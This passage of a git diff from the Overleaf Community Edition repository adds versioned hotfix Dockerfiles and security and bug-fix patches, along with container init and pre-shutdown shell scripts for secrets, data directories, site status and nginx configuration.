invite') + }) + +- return invite ++ return _.pick(invite.toObject(), [ ++ 'email', ++ 'sendingUserId', ++ 'projectId', ++ 'privileges', ++ '_id', ++ 'createdAt', ++ 'expires', ++ ]) + }, + + async revokeInvite(projectId, inviteId) { diff --git a/server-ce/hotfix/5.0.7/pr_19293.patch b/server-ce/hotfix/5.0.7/pr_19293.patch new file mode 100644 index 0000000..3a9c7d0 --- /dev/null +++ b/server-ce/hotfix/5.0.7/pr_19293.patch @@ -0,0 +1,17 @@ +--- a/services/clsi/app/js/StaticServerForbidSymlinks.js ++++ b/services/clsi/app/js/StaticServerForbidSymlinks.js +@@ -25,9 +25,13 @@ module.exports = ForbidSymlinks = function (staticFn, root, options) { + let file, projectId, result + const path = req.url + // check that the path is of the form /project_id_or_name/path/to/file.log +- if ((result = path.match(/^\/?([a-zA-Z0-9_-]+)\/(.*)/))) { ++ if ((result = path.match(/^\/([a-zA-Z0-9_-]+)\/(.*)$/s))) { + projectId = result[1] + file = result[2] ++ if (path !== `/${projectId}/${file}`) { ++ logger.warn({ path }, 'unrecognized file request') ++ return res.sendStatus(404) ++ } + } else { + logger.warn({ path }, 'unrecognized file request') + return res.sendStatus(404) diff --git a/server-ce/hotfix/5.0.7/pr_19296.patch b/server-ce/hotfix/5.0.7/pr_19296.patch new file mode 100644 index 0000000..578c488 --- /dev/null +++ b/server-ce/hotfix/5.0.7/pr_19296.patch @@ -0,0 +1,22 @@ +--- a/services/clsi/app/js/LatexRunner.js ++++ b/services/clsi/app/js/LatexRunner.js +@@ -110,11 +110,14 @@ function _writeLogOutput(projectId, directory, output, callback) { + // internal method for writing non-empty log files + function _writeFile(file, content, cb) { + if (content && content.length > 0) { +- fs.writeFile(file, content, err => { +- if (err) { +- logger.error({ err, projectId, file }, 'error writing log file') // don't fail on error +- } +- cb() ++ fs.unlink(file, () => { ++ fs.writeFile(file, content, { flag: 'wx' }, err => { ++ if (err) { ++ // don't fail on error ++ logger.error({ err, projectId, file }, 'error writing log file') ++ } ++ cb() ++ }) + }) + } else { + cb() diff --git a/server-ce/hotfix/5.0.7/pr_19297.patch b/server-ce/hotfix/5.0.7/pr_19297.patch new file mode 100644 index 0000000..2e46183 --- /dev/null +++ 
b/server-ce/hotfix/5.0.7/pr_19297.patch
@@ -0,0 +1,70 @@
+--- a/services/web/app/src/Features/Spelling/SpellingController.js
++++ b/services/web/app/src/Features/Spelling/SpellingController.js
+@@ -28,39 +28,35 @@ module.exports = {
+ })
+ },
+
+- proxyRequestToSpellingApi(req, res) {
++ proxyCheckRequestToSpellingApi(req, res) {
+ const { language } = req.body
+
+- let url = req.url.slice('/spelling'.length)
+-
+- if (url === '/check') {
+- if (!language) {
+- logger.error('"language" field should be included for spell checking')
+- return res.status(422).json({ misspellings: [] })
+- }
++ if (!language) {
++ logger.error({}, '"language" field should be included for spell checking')
++ return res.status(422).json({ misspellings: [] })
++ }
+
+- if (!languageCodeIsSupported(language)) {
+- // this log statement can be changed to 'error' once projects with
+- // unsupported languages are removed from the DB
+- logger.debug({ language }, 'language not supported')
+- return res.status(422).json({ misspellings: [] })
+- }
++ if (!languageCodeIsSupported(language)) {
++ // this log statement can be changed to 'error' once projects with
++ // unsupported languages are removed from the DB
++ logger.debug({ language }, 'language not supported')
++ return res.status(422).json({ misspellings: [] })
+ }
+
+ const userId = SessionManager.getLoggedInUserId(req.session)
+- url = `/user/${userId}${url}`
++ const url = `${Settings.apis.spelling.url}/user/${userId}/check`
+ req.headers.Host = Settings.apis.spelling.host
+ return request({
+- url: Settings.apis.spelling.url + url,
+- method: req.method,
++ url,
++ method: 'POST',
+ headers: req.headers,
+ json: req.body,
+ timeout: TEN_SECONDS,
+ })
+ .on('error', function (error) {
+- logger.error({ err: error }, 'Spelling API error')
++ logger.error({ err: error }, 'Spelling Check API error')
+ return res.status(500).end()
+ })
+ .pipe(res)
+ },
+-}
++}
+\ No newline at end of file
+
+--- a/services/web/app/src/router.js
++++ b/services/web/app/src/router.js
+@@ -1083,7 +1083,7 @@ function initialize(webRouter, privateApiRouter, publicApiRouter) {
+ webRouter.post(
+ '/spelling/check',
+ AuthenticationController.requireLogin(),
+- SpellingController.proxyRequestToSpellingApi
++ SpellingController.proxyCheckRequestToSpellingApi
+ )
+ webRouter.post(
+ '/spelling/learn',
diff --git a/server-ce/hotfix/5.1.1/Dockerfile b/server-ce/hotfix/5.1.1/Dockerfile
new file mode 100644
index 0000000..5936808
--- /dev/null
+++ b/server-ce/hotfix/5.1.1/Dockerfile
@@ -0,0 +1,20 @@
+FROM sharelatex/sharelatex:5.1.0
+
+# Confirmation email fix
+COPY pr_19676.patch .
+RUN patch -p1 < pr_19676.patch && rm pr_19676.patch
+
+# Fix crash on invalid URLs
+COPY pr_19612.patch .
+RUN patch -p1 < pr_19612.patch && rm pr_19612.patch
+
+# Remove Editor Resources check from launchpad
+COPY pr_19543.patch .
+RUN patch -p1 < pr_19543.patch && rm pr_19543.patch
+
+COPY pr_19550.patch .
+RUN patch -p1 < pr_19550.patch && rm pr_19550.patch + +COPY is_19575.patch /etc/nginx/sites-enabled/ +RUN cd /etc/nginx/sites-enabled && patch -p0 < is_19575.patch && rm is_19575.patch + diff --git a/server-ce/hotfix/5.1.1/is_19575.patch b/server-ce/hotfix/5.1.1/is_19575.patch new file mode 100644 index 0000000..ca78ae5 --- /dev/null +++ b/server-ce/hotfix/5.1.1/is_19575.patch @@ -0,0 +1,19 @@ +--- overleaf.conf ++++ overleaf.conf +@@ -67,6 +67,16 @@ server { + proxy_http_version 1.1; + } + ++ # block external access to metrics ++ location ~* ^/metrics/?$ { ++ return 404 'Not found'; ++ } ++ ++ # block external access to all health checks /health_check, /health_check/full, etc ++ location ~* ^/health_check { ++ return 404 'Not found'; ++ } ++ + # Load any extra configuration for this vhost + include /etc/nginx/vhost-extras/overleaf/*.conf; + } diff --git a/server-ce/hotfix/5.1.1/pr_19543.patch b/server-ce/hotfix/5.1.1/pr_19543.patch new file mode 100644 index 0000000..77e2b11 --- /dev/null +++ b/server-ce/hotfix/5.1.1/pr_19543.patch @@ -0,0 +1,30 @@ +diff --git a/services/web/locales/en.json b/services/web/locales/en.json +index a953a01a1d7..13e20b37279 100644 +--- a/services/web/locales/en.json ++++ b/services/web/locales/en.json +@@ -519,7 +519,6 @@ + "editor_disconected_click_to_reconnect": "Editor disconnected, click anywhere to reconnect.", + "editor_limit_exceeded_in_this_project": "Too many editors in this project", + "editor_only_hide_pdf": "Editor only <0>(hide PDF)", +- "editor_resources": "Editor Resources", + "editor_theme": "Editor theme", + "educational_discount_applied": "40% educational discount applied!", + "educational_discount_available_for_groups_of_ten_or_more": "The educational discount is available for groups of 10 or more", +diff --git a/services/web/modules/launchpad/app/views/launchpad.pug b/services/web/modules/launchpad/app/views/launchpad.pug +index c478fe7b649..28d3ff8fc83 100644 +--- a/services/web/modules/launchpad/app/views/launchpad.pug ++++ b/services/web/modules/launchpad/app/views/launchpad.pug +@@ -166,13 +166,6 @@ block content + + h2 #{translate('status_checks')} + +- +- .row.row-spaced-small +- .col-sm-5 +- | #{translate('editor_resources')} +- .col-sm-7 +- +launchpad-check('ide') +- + + .row.row-spaced-small + .col-sm-5 diff --git a/server-ce/hotfix/5.1.1/pr_19550.patch b/server-ce/hotfix/5.1.1/pr_19550.patch new file mode 100644 index 0000000..f52a5dd --- /dev/null +++ b/server-ce/hotfix/5.1.1/pr_19550.patch @@ -0,0 +1,59 @@ +diff --git a/services/web/app/src/infrastructure/CSP.js b/services/web/app/src/infrastructure/CSP.js +index 28f4f380d3d..abc11c59a48 100644 +--- a/services/web/app/src/infrastructure/CSP.js ++++ b/services/web/app/src/infrastructure/CSP.js +@@ -6,6 +6,7 @@ module.exports = function ({ + reportPercentage, + reportOnly = false, + exclude = [], ++ viewDirectives = {}, + }) { + const header = reportOnly + ? 
'Content-Security-Policy-Report-Only' +@@ -33,7 +34,12 @@ module.exports = function ({ + + res.locals.scriptNonce = scriptNonce + +- const policy = buildViewPolicy(scriptNonce, reportPercentage, reportUri) ++ const policy = buildViewPolicy( ++ scriptNonce, ++ reportPercentage, ++ reportUri, ++ viewDirectives[view] ++ ) + + // Note: https://csp-evaluator.withgoogle.com/ is useful for checking the policy + +@@ -68,11 +74,17 @@ const buildDefaultPolicy = (reportUri, styleSrc) => { + return directives.join('; ') + } + +-const buildViewPolicy = (scriptNonce, reportPercentage, reportUri) => { ++const buildViewPolicy = ( ++ scriptNonce, ++ reportPercentage, ++ reportUri, ++ viewDirectives ++) => { + const directives = [ + `script-src 'nonce-${scriptNonce}' 'unsafe-inline' 'strict-dynamic' https: 'report-sample'`, // only allow scripts from certain sources + `object-src 'none'`, // forbid loading an "object" element + `base-uri 'none'`, // forbid setting a "base" element ++ ...(viewDirectives ?? []), + ] + + if (reportUri) { +diff --git a/services/web/config/settings.defaults.js b/services/web/config/settings.defaults.js +index cad13ab8156..ab738babdcd 100644 +--- a/services/web/config/settings.defaults.js ++++ b/services/web/config/settings.defaults.js +@@ -911,6 +911,9 @@ module.exports = { + reportPercentage: parseFloat(process.env.CSP_REPORT_PERCENTAGE) || 0, + reportUri: process.env.CSP_REPORT_URI, + exclude: [], ++ viewDirectives: { ++ 'app/views/project/ide-react': [`img-src 'self' data: blob:`], ++ }, + }, + + unsupportedBrowsers: { diff --git a/server-ce/hotfix/5.1.1/pr_19612.patch b/server-ce/hotfix/5.1.1/pr_19612.patch new file mode 100644 index 0000000..3f46f92 --- /dev/null +++ b/server-ce/hotfix/5.1.1/pr_19612.patch @@ -0,0 +1,46 @@ +diff --git a/services/web/app/src/Features/HealthCheck/HealthCheckController.js b/services/web/app/src/Features/HealthCheck/HealthCheckController.js +index 278f04bb767..ff074cfa816 100644 +--- a/services/web/app/src/Features/HealthCheck/HealthCheckController.js ++++ b/services/web/app/src/Features/HealthCheck/HealthCheckController.js +@@ -45,6 +45,10 @@ module.exports = { + logger.err({ err }, 'failed api redis health check') + return res.sendStatus(500) + } ++ if (!settings.smokeTest.userId) { ++ logger.err({}, 'smokeTest.userId is undefined in health check') ++ return res.sendStatus(404) ++ } + UserGetter.getUserEmail(settings.smokeTest.userId, (err, email) => { + if (err) { + logger.err({ err }, 'failed api mongo health check') +diff --git a/services/web/app/src/infrastructure/ExpressLocals.js b/services/web/app/src/infrastructure/ExpressLocals.js +index 5f14977d3a3..2e9ed4f1ebb 100644 +--- a/services/web/app/src/infrastructure/ExpressLocals.js ++++ b/services/web/app/src/infrastructure/ExpressLocals.js +@@ -11,6 +11,7 @@ const Features = require('./Features') + const SessionManager = require('../Features/Authentication/SessionManager') + const PackageVersions = require('./PackageVersions') + const Modules = require('./Modules') ++const Errors = require('../Features/Errors/Errors') + const { + canRedirectToAdminDomain, + hasAdminAccess, +@@ -236,10 +237,14 @@ module.exports = function (webRouter, privateApiRouter, publicApiRouter) { + + // Don't include the query string parameters, otherwise Google + // treats ?nocdn=true as the canonical version +- const parsedOriginalUrl = new URL(req.originalUrl, Settings.siteUrl) +- res.locals.currentUrl = parsedOriginalUrl.pathname +- res.locals.currentUrlWithQueryParams = +- parsedOriginalUrl.pathname + 
parsedOriginalUrl.search ++ try { ++ const parsedOriginalUrl = new URL(req.originalUrl, Settings.siteUrl) ++ res.locals.currentUrl = parsedOriginalUrl.pathname ++ res.locals.currentUrlWithQueryParams = ++ parsedOriginalUrl.pathname + parsedOriginalUrl.search ++ } catch (err) { ++ return next(new Errors.InvalidError()) ++ } + res.locals.capitalize = function (string) { + if (string.length === 0) { + return '' diff --git a/server-ce/hotfix/5.1.1/pr_19676.patch b/server-ce/hotfix/5.1.1/pr_19676.patch new file mode 100644 index 0000000..287ee78 --- /dev/null +++ b/server-ce/hotfix/5.1.1/pr_19676.patch @@ -0,0 +1,26 @@ +diff --git a/services/web/app/src/Features/Email/EmailBuilder.js b/services/web/app/src/Features/Email/EmailBuilder.js +index 46d014a8e14..d839d67f634 100644 +--- a/services/web/app/src/Features/Email/EmailBuilder.js ++++ b/services/web/app/src/Features/Email/EmailBuilder.js +@@ -234,7 +234,7 @@ templates.confirmEmail = ctaTemplate({ + }, + secondaryMessage() { + return [ +- 'If you did not request this, please let us know at support@overleaf.com.', ++ `If you did not request this, please let us know at ${settings.adminEmail}.`, + `If you have any questions or trouble confirming your email address, please get in touch with our support team at ${settings.adminEmail}.`, + ] + }, +diff --git a/services/web/app/src/Features/User/UserRegistrationHandler.js b/services/web/app/src/Features/User/UserRegistrationHandler.js +index 2802fdc81c5..02c52f73fd2 100644 +--- a/services/web/app/src/Features/User/UserRegistrationHandler.js ++++ b/services/web/app/src/Features/User/UserRegistrationHandler.js +@@ -113,7 +113,7 @@ const UserRegistrationHandler = { + + const setNewPasswordUrl = `${settings.siteUrl}/user/activate?token=${token}&user_id=${user._id}` + +- EmailHandler.promises ++ await EmailHandler.promises + .sendEmail('registered', { + to: user.email, + setNewPasswordUrl, diff --git a/server-ce/hotfix/5.2.1/Dockerfile b/server-ce/hotfix/5.2.1/Dockerfile new file mode 100644 index 0000000..63cc952 --- /dev/null +++ b/server-ce/hotfix/5.2.1/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:5.2.0 + +# Subnet rate limiter fix +COPY pr_21327.patch / +RUN cd / && patch -p0 < pr_21327.patch && rm pr_21327.patch diff --git a/server-ce/hotfix/5.2.1/pr_21327.patch b/server-ce/hotfix/5.2.1/pr_21327.patch new file mode 100644 index 0000000..f2e49df --- /dev/null +++ b/server-ce/hotfix/5.2.1/pr_21327.patch @@ -0,0 +1,36 @@ +--- overleaf/services/web/app/src/infrastructure/RateLimiter.js ++++ overleaf/services/web/app/src/infrastructure/RateLimiter.js +@@ -39,7 +39,7 @@ class RateLimiter { + keyPrefix: `rate-limit:${name}`, + storeClient: rclient, + }) +- if (opts.subnetPoints) { ++ if (opts.subnetPoints && !Settings.rateLimit?.subnetRateLimiterDisabled) { + this._subnetRateLimiter = new RateLimiterFlexible.RateLimiterRedis({ + ...opts, + points: opts.subnetPoints, +--- overleaf/services/web/config/settings.defaults.js ++++ overleaf/services/web/config/settings.defaults.js +@@ -777,6 +777,8 @@ module.exports = { + reloadModuleViewsOnEachRequest: process.env.NODE_ENV === 'development', + + rateLimit: { ++ subnetRateLimiterDisabled: ++ process.env.SUBNET_RATE_LIMITER_DISABLED === 'true', + autoCompile: { + everyone: process.env.RATE_LIMIT_AUTO_COMPILE_EVERYONE || 100, + standard: process.env.RATE_LIMIT_AUTO_COMPILE_STANDARD || 25, +--- etc/overleaf/settings.js ++++ etc/overleaf/settings.js +@@ -212,6 +212,11 @@ const settings = { + enabled: process.env.OVERLEAF_CSP_ENABLED !== 'false', + }, + ++ 
rateLimit: { ++ subnetRateLimiterDisabled: ++ process.env.SUBNET_RATE_LIMITER_DISABLED !== 'false', ++ }, ++ + // These credentials are used for authenticating api requests + // between services that may need to go over public channels + httpAuthUsers, diff --git a/server-ce/hotfix/5.3.1/Dockerfile b/server-ce/hotfix/5.3.1/Dockerfile new file mode 100644 index 0000000..ec0bef5 --- /dev/null +++ b/server-ce/hotfix/5.3.1/Dockerfile @@ -0,0 +1,14 @@ +FROM sharelatex/sharelatex:5.3.0 + +# Update copyright year +COPY pr_22950.patch . +RUN patch -p0 < pr_22950.patch && rm pr_22950.patch + + +# Update Mongoose +RUN npm install mongoose@^8.9.5 --save -w services/web \ + && npm install mongodb@6.12.0 --save \ + -w services/chat -w services/contacts -w services/docstore \ + -w services/history-v1 -w libraries/mongo-utils \ + && npm install mongodb@6.12.0 --save \ + && rm -rf /root/.cache /root/.npm $(find /tmp/ -mindepth 1 -maxdepth 1) diff --git a/server-ce/hotfix/5.3.1/pr_22950.patch b/server-ce/hotfix/5.3.1/pr_22950.patch new file mode 100644 index 0000000..cd066f9 --- /dev/null +++ b/server-ce/hotfix/5.3.1/pr_22950.patch @@ -0,0 +1,33 @@ +--- services/web/app/views/layout/thin-footer-bootstrap-5.pug ++++ services/web/app/views/layout/thin-footer-bootstrap-5.pug +@@ -7,7 +7,7 @@ footer.site-footer + if !settings.nav.hide_powered_by + li + //- year of Server Pro release, static +- | © 2024 ++ | © 2025 + | + a(href='https://www.overleaf.com/for/enterprises') Powered by Overleaf + +--- services/web/app/views/layout/thin-footer.pug ++++ services/web/app/views/layout/thin-footer.pug +@@ -9,7 +9,7 @@ footer.site-footer + else if !settings.nav.hide_powered_by + li + //- year of Server Pro release, static +- | © 2024 ++ | © 2025 + | + a(href='https://www.overleaf.com/for/enterprises') Powered by Overleaf + +--- services/web/frontend/js/features/ui/components/bootstrap-5/footer/thin-footer.tsx ++++ services/web/frontend/js/features/ui/components/bootstrap-5/footer/thin-footer.tsx +@@ -60,7 +60,7 @@ function ThinFooter({ + {showPoweredBy ? ( + <> +
  •
+- {/* year of Server Pro release, static */}© 2024{' '}
++ {/* year of Server Pro release, static */}© 2025{' '}
+ <a href="https://www.overleaf.com/for/enterprises">
+ Powered by Overleaf
+ </a>
diff --git a/server-ce/hotfix/5.3.2/Dockerfile b/server-ce/hotfix/5.3.2/Dockerfile
new file mode 100644
index 0000000..3a43371
--- /dev/null
+++ b/server-ce/hotfix/5.3.2/Dockerfile
@@ -0,0 +1 @@
+FROM sharelatex/sharelatex:5.3.1
diff --git a/server-ce/hotfix/5.3.3/Dockerfile b/server-ce/hotfix/5.3.3/Dockerfile
new file mode 100644
index 0000000..034eafb
--- /dev/null
+++ b/server-ce/hotfix/5.3.3/Dockerfile
@@ -0,0 +1 @@
+FROM sharelatex/sharelatex:5.3.2
diff --git a/server-ce/init_preshutdown_scripts/00_close_site b/server-ce/init_preshutdown_scripts/00_close_site
new file mode 100755
index 0000000..ed5404f
--- /dev/null
+++ b/server-ce/init_preshutdown_scripts/00_close_site
@@ -0,0 +1,34 @@
+#!/bin/sh
+
+. /etc/container_environment.sh
+. /etc/overleaf/env.sh
+
+SITE_MAINTENANCE_FILE_BAK="$SITE_MAINTENANCE_FILE.bak.shutdown"
+
+mv "${SITE_MAINTENANCE_FILE}" "${SITE_MAINTENANCE_FILE_BAK}"
+echo "closed" > "${SITE_MAINTENANCE_FILE}"
+
+# status file is polled every 5 seconds
+sleep 5
+
+# give users a 5 second grace period before disconnecting them and starting the shutdown
+cd /overleaf/services/web && node scripts/disconnect_all_users.mjs --delay-in-seconds=5 >> /var/log/overleaf/web.log 2>&1
+
+EXIT_CODE="$?"
+if [ $EXIT_CODE -ne 0 ]
+then
+ echo "scripts/disconnect_all_users.mjs failed with exit code $EXIT_CODE"
+ exit 1
+fi
+
+sleep 10 &
+GIVE_EDITOR_10_SECONDS_TO_RELOAD=$!
+
+# wait for disconnection
+while ! sv stop real-time-overleaf; do
+ sleep 1
+done
+
+wait $GIVE_EDITOR_10_SECONDS_TO_RELOAD
+
+exit 0
diff --git a/server-ce/init_preshutdown_scripts/01_flush_document_updater b/server-ce/init_preshutdown_scripts/01_flush_document_updater
new file mode 100755
index 0000000..0900fe5
--- /dev/null
+++ b/server-ce/init_preshutdown_scripts/01_flush_document_updater
@@ -0,0 +1,15 @@
+#!/bin/sh
+
+. /etc/container_environment.sh
+. /etc/overleaf/env.sh
+
+cd /overleaf/services/document-updater && node scripts/flush_all.js >> /var/log/overleaf/document-updater.log 2>&1
+
+EXIT_CODE="$?"
+if [ $EXIT_CODE -ne 0 ]
+then
+ echo "document-updater/scripts/flush_all.js failed with exit code $EXIT_CODE"
+ exit 1
+fi
+
+exit 0
diff --git a/server-ce/init_preshutdown_scripts/02_flush_project_history b/server-ce/init_preshutdown_scripts/02_flush_project_history
new file mode 100755
index 0000000..f8ac516
--- /dev/null
+++ b/server-ce/init_preshutdown_scripts/02_flush_project_history
@@ -0,0 +1,15 @@
+#!/bin/sh
+
+. /etc/container_environment.sh
+. /etc/overleaf/env.sh
+
+cd /overleaf/services/project-history && node scripts/flush_all.js >> /var/log/overleaf/project-history.log 2>&1
+
+EXIT_CODE="$?"
+if [ $EXIT_CODE -ne 0 ]
+then
+ echo "project-history/scripts/flush_all.js failed with exit code $EXIT_CODE"
+ exit 1
+fi
+
+exit 0
diff --git a/server-ce/init_scripts/000_check_for_old_bind_mounts_5.sh b/server-ce/init_scripts/000_check_for_old_bind_mounts_5.sh
new file mode 100755
index 0000000..6c501c7
--- /dev/null
+++ b/server-ce/init_scripts/000_check_for_old_bind_mounts_5.sh
@@ -0,0 +1,78 @@
+#!/bin/bash
+
+set -e
+
+POTENTIAL_OLD_PATHS="
+/etc/sharelatex
+/var/lib/sharelatex
+/var/log/sharelatex
+"
+
+OLD_ITEMS=""
+for path in ${POTENTIAL_OLD_PATHS}; do
+ if [[ -e "$path" ]]; then
+ OLD_ITEMS="$OLD_ITEMS $path"
+ fi
+done
+
+if [[ "$OLD_ITEMS" == "" ]]; then
+ exit 0
+fi
+
+OLD_ITEMS=$(echo "$OLD_ITEMS" | xargs -n1 | sed 's/^/ - /')
+N=$(echo "$OLD_ITEMS" | wc -l)
+cat <<EOF
+------------------------------------------------------------------------
+
+ Found $N old path(s) from a previous sharelatex-based install:
+
+$OLD_ITEMS
+
+ Please update your bind mounts:
+
+ - /etc/sharelatex -> /etc/overleaf
+ - /var/lib/sharelatex -> /var/lib/overleaf
+ - /var/log/sharelatex -> /var/log/overleaf
+
+ Overleaf toolkit setups:
+
+ github.com/overleaf/toolkit$ bin/upgrade
+
+
+ Legacy docker compose setups/Horizontal scaling setups:
+
+ before:
+
+ services:
+ sharelatex:
+ volumes:
+ - /my/docker-host/path:/var/lib/sharelatex
+
+ after:
+
+ services:
+ sharelatex:
+ volumes:
+ - /my/docker-host/path:/var/lib/overleaf
+
+
+ Other deployment methods:
+
+ Adapt the docker compose example or get in touch with support.
+
+
+ Server Pro: Please update SANDBOXED_COMPILES_HOST_DIR if needed.
+
+
+ Refusing to start up, exiting in 10s.
+
+------------------------------------------------------------------------
+EOF
+
+sleep 10
+exit 101
diff --git a/server-ce/init_scripts/000_check_for_old_env_vars_5.sh b/server-ce/init_scripts/000_check_for_old_env_vars_5.sh
new file mode 100755
index 0000000..2beb008
--- /dev/null
+++ b/server-ce/init_scripts/000_check_for_old_env_vars_5.sh
@@ -0,0 +1,56 @@
+#!/bin/bash
+
+set -e
+
+OLD_ITEMS=$(env | cut -d '=' -f1 | grep SHARELATEX | sed 's/^/ - /')
+
+if [[ "$OLD_ITEMS" == "" ]]; then
+ exit 0
+fi
+
+N=$(echo "$OLD_ITEMS" | wc -l)
+cat <<EOF
+------------------------------------------------------------------------
+
+ Found $N old environment variable(s) with a SHARELATEX_ prefix:
+
+$OLD_ITEMS
+
+ Please rename them, e.g. SHARELATEX_MONGO_URL -> OVERLEAF_MONGO_URL, or
+ remove old entries from your configuration.
+
+ You can use the following script for migrating your config.
+
+ Overleaf toolkit setups:
+
+ github.com/overleaf/toolkit$ bin/upgrade
+ github.com/overleaf/toolkit$ bin/rename-env-vars-5-0.sh
+
+
+ Legacy docker compose setups/Horizontal scaling setups:
+
+ github.com/overleaf/overleaf$ git pull
+ github.com/overleaf/overleaf$ server-ce/bin/rename-env-vars-5-0.sh
+
+ # When using a docker-compose.override.yml file (or other file name):
+ github.com/overleaf/overleaf$ server-ce/bin/rename-env-vars-5-0.sh docker-compose.override.yml
+
+
+ Other deployment methods:
+
+ Try using the docker compose script or get in touch with support.
+
+
+ Refusing to start up, exiting in 10s.
+
+------------------------------------------------------------------------
+EOF
+
+sleep 10
+exit 101
diff --git a/server-ce/init_scripts/100_generate_secrets.sh b/server-ce/init_scripts/100_generate_secrets.sh
new file mode 100755
index 0000000..ec7e846
--- /dev/null
+++ b/server-ce/init_scripts/100_generate_secrets.sh
@@ -0,0 +1,40 @@
+#!/bin/bash
+set -e -o pipefail
+
+# generates secrets and defines them as environment variables
+# https://github.com/phusion/baseimage-docker#centrally-defining-your-own-environment-variables
+
+WEB_API_PASSWORD_FILE=/etc/container_environment/WEB_API_PASSWORD
+STAGING_PASSWORD_FILE=/etc/container_environment/STAGING_PASSWORD # HTTP auth for history-v1
+V1_HISTORY_PASSWORD_FILE=/etc/container_environment/V1_HISTORY_PASSWORD
+CRYPTO_RANDOM_FILE=/etc/container_environment/CRYPTO_RANDOM
+OT_JWT_AUTH_KEY_FILE=/etc/container_environment/OT_JWT_AUTH_KEY
+
+# 32 random bytes, base64-encoded; rev|cut|rev drops the trailing '=' padding,
+# and tr strips newlines and the '+' and '/' characters
+generate_secret () {
+ dd if=/dev/urandom bs=1 count=32 2>/dev/null | base64 -w 0 | rev | cut -b 2- | rev | tr -d '\n+/'
+}
+
+if [ ! -f "$WEB_API_PASSWORD_FILE" ] ||
+ [ ! -f "$STAGING_PASSWORD_FILE" ] ||
+ [ ! -f "$V1_HISTORY_PASSWORD_FILE" ] ||
+ [ ! -f "$CRYPTO_RANDOM_FILE" ] ||
+ [ ! -f "$OT_JWT_AUTH_KEY_FILE" ]
+then
+ echo "generating random secrets"
+
+ SECRET=$(generate_secret)
+ echo "${SECRET}" > ${WEB_API_PASSWORD_FILE}
+
+ SECRET=$(generate_secret)
+ echo "${SECRET}" > ${STAGING_PASSWORD_FILE}
+ echo "${SECRET}" > ${V1_HISTORY_PASSWORD_FILE}
+
+ SECRET=$(generate_secret)
+ echo "${SECRET}" > ${CRYPTO_RANDOM_FILE}
+
+ SECRET=$(generate_secret)
+ echo "${SECRET}" > ${OT_JWT_AUTH_KEY_FILE}
+fi
+
diff --git a/server-ce/init_scripts/100_make_overleaf_data_dirs.sh b/server-ce/init_scripts/100_make_overleaf_data_dirs.sh
new file mode 100755
index 0000000..80b69eb
--- /dev/null
+++ b/server-ce/init_scripts/100_make_overleaf_data_dirs.sh
@@ -0,0 +1,35 @@
+#!/bin/sh
+set -e
+
+mkdir -p /var/lib/overleaf/data
+chown www-data:www-data /var/lib/overleaf/data
+
+mkdir -p /var/lib/overleaf/data/user_files
+chown www-data:www-data /var/lib/overleaf/data/user_files
+
+mkdir -p /var/lib/overleaf/data/compiles
+chown www-data:www-data /var/lib/overleaf/data/compiles
+
+mkdir -p /var/lib/overleaf/data/output
+chown www-data:www-data /var/lib/overleaf/data/output
+
+mkdir -p /var/lib/overleaf/data/cache
+chown www-data:www-data /var/lib/overleaf/data/cache
+
+mkdir -p /var/lib/overleaf/data/template_files
+chown www-data:www-data /var/lib/overleaf/data/template_files
+
+mkdir -p /var/lib/overleaf/data/history
+chown www-data:www-data /var/lib/overleaf/data/history
+
+mkdir -p /var/lib/overleaf/tmp/projectHistories
+chown www-data:www-data /var/lib/overleaf/tmp/projectHistories
+
+mkdir -p /var/lib/overleaf/tmp/dumpFolder
+chown www-data:www-data /var/lib/overleaf/tmp/dumpFolder
+
+mkdir -p /var/lib/overleaf/tmp
+chown www-data:www-data /var/lib/overleaf/tmp
+
+mkdir -p /var/lib/overleaf/tmp/uploads
+chown www-data:www-data /var/lib/overleaf/tmp/uploads
diff --git a/server-ce/init_scripts/100_restore_site_status.sh b/server-ce/init_scripts/100_restore_site_status.sh
new file mode 100755
index 0000000..151d57c
--- /dev/null
+++ b/server-ce/init_scripts/100_restore_site_status.sh
@@ -0,0 +1,12 @@
+#!/bin/bash
+
+set -e
+
+# pre-shutdown scripts close the site by overriding the content of SITE_MAINTENANCE_FILE,
+# this script restores the original value on container restart
+SITE_MAINTENANCE_FILE_BAK="$SITE_MAINTENANCE_FILE.bak.shutdown" + +if [ -f "${SITE_MAINTENANCE_FILE_BAK}" ]; then + mv -f "${SITE_MAINTENANCE_FILE_BAK}" "${SITE_MAINTENANCE_FILE}" + rm -f "${SITE_MAINTENANCE_FILE_BAK}" +fi diff --git a/server-ce/init_scripts/100_set_docker_host_ipaddress.sh b/server-ce/init_scripts/100_set_docker_host_ipaddress.sh new file mode 100755 index 0000000..646b55a --- /dev/null +++ b/server-ce/init_scripts/100_set_docker_host_ipaddress.sh @@ -0,0 +1,5 @@ +#!/bin/bash +set -e -o pipefail + +# See the bottom of http://stackoverflow.com/questions/24319662/from-inside-of-a-docker-container-how-do-i-connect-to-the-localhost-of-the-mach +echo "$(route -n | awk '/UG[ \t]/{print $2}') dockerhost" >> /etc/hosts diff --git a/server-ce/init_scripts/200_nginx_config_template.sh b/server-ce/init_scripts/200_nginx_config_template.sh new file mode 100755 index 0000000..f570726 --- /dev/null +++ b/server-ce/init_scripts/200_nginx_config_template.sh @@ -0,0 +1,43 @@ +#!/bin/sh + +set -e + +## Generate nginx config files from templates, +## with environment variables substituted + +nginx_dir='/etc/nginx' +nginx_templates_dir="${nginx_dir}/templates" + +if ! [ -d "${nginx_templates_dir}" ]; then + echo "Nginx: no template directory found, skipping" + exit 0 +fi + +nginx_template_file="${nginx_templates_dir}/nginx.conf.template" +nginx_config_file="${nginx_dir}/nginx.conf" + +if [ -f "${nginx_template_file}" ]; then + export NGINX_KEEPALIVE_TIMEOUT="${NGINX_KEEPALIVE_TIMEOUT:-65}" + export NGINX_WORKER_CONNECTIONS="${NGINX_WORKER_CONNECTIONS:-768}" + export NGINX_WORKER_PROCESSES="${NGINX_WORKER_PROCESSES:-4}" + + echo "Nginx: generating config file from template" + + # Note the single-quotes, they are important. + # This is a pass-list of env-vars that envsubst + # should operate on. + # shellcheck disable=SC2016 + envsubst ' + ${NGINX_KEEPALIVE_TIMEOUT} + ${NGINX_WORKER_CONNECTIONS} + ${NGINX_WORKER_PROCESSES} + ' \ + < "${nginx_template_file}" \ + > "${nginx_config_file}" + + echo "Checking Nginx config" + nginx -t + + echo "Nginx: reloading config" + service nginx reload +fi diff --git a/server-ce/init_scripts/300_delete_old_logs.sh b/server-ce/init_scripts/300_delete_old_logs.sh new file mode 100755 index 0000000..dad919e --- /dev/null +++ b/server-ce/init_scripts/300_delete_old_logs.sh @@ -0,0 +1,7 @@ +#!/bin/sh +set -e + 